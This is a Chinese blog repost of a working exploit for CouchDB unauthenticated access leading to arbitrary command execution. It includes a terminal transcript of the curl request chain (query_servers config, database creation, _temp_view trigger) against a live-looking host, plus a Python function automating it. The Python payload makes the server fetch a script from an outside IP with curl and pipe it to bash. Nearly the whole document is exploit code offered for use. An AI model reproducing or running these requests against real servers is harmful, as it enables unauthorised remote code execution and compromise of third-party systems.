CouchDB未授权访问漏洞执行任意系统命令exp

root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/_config/query_servers/cmd' -d '"/sbin/ifconfig>/tmp/6666"'
""
root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest'
{"ok":true}
root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
{"ok":true,"id":"vul","rev":"1-967a00dff5e02add41819138abb3284d"}
root@ac0e5efdb6a3:~# curl -X POST 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
{"error":"EXIT","reason":"{{badmatch,{error,{bad_return_value,{os_process_error,{exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n                       [{file,\"couch_query_servers.erl\"},{line,477}]},\n  {couch_query_servers,lang_proc,3,\n                       [{file,\"couch_query_servers.erl\"},{line,462}]},\n  {couch_query_servers,handle_call,3,\n                       [{file,\"couch_query_servers.erl\"},{line,334}]},\n  {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,585}]},\n  {proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,239}]}]}"}
root@ac0e5efdb6a3:~#

PY:

def CouchDb(url):
    print url
    cmd = 'curl -X PUT \'' +url +'/_config/query_servers/cmd\''+ ' -d ' + '\'"/usr/bin/curl http://192.184.40.86:6554/1.sh|bash>/tmp/6666"\''
    cmd1 = 'curl -X PUT \'' +url +'/vultest\''
    cmd2 = 'curl -X PUT \'' +url +'/vultest/vul\'' +' -d ' + '\'{"_id":"770895a97726d5ca6d70a22173005c7b"}\''
    cmd3 = 'curl -X POST \'' +url +'/vultest/_temp_view?limit=11\'' + ' -d '+ '\'{"language":"cmd","map":""}\''+ ' -H ' '\'Content-Type: application/json\''
    #print cmd3
    step1 = os.system(cmd)
    step2 = os.system(cmd1)
    
    step3 = os.system(cmd2)
    setp4 = os.system(cmd3)
    pass

参考:

http://drops.wooyun.org/papers/16030

转载于:https://www.cnblogs.com/persuit/p/5602062.html

你可能感兴趣的:(CouchDB未授权访问漏洞执行任意系统命令exp)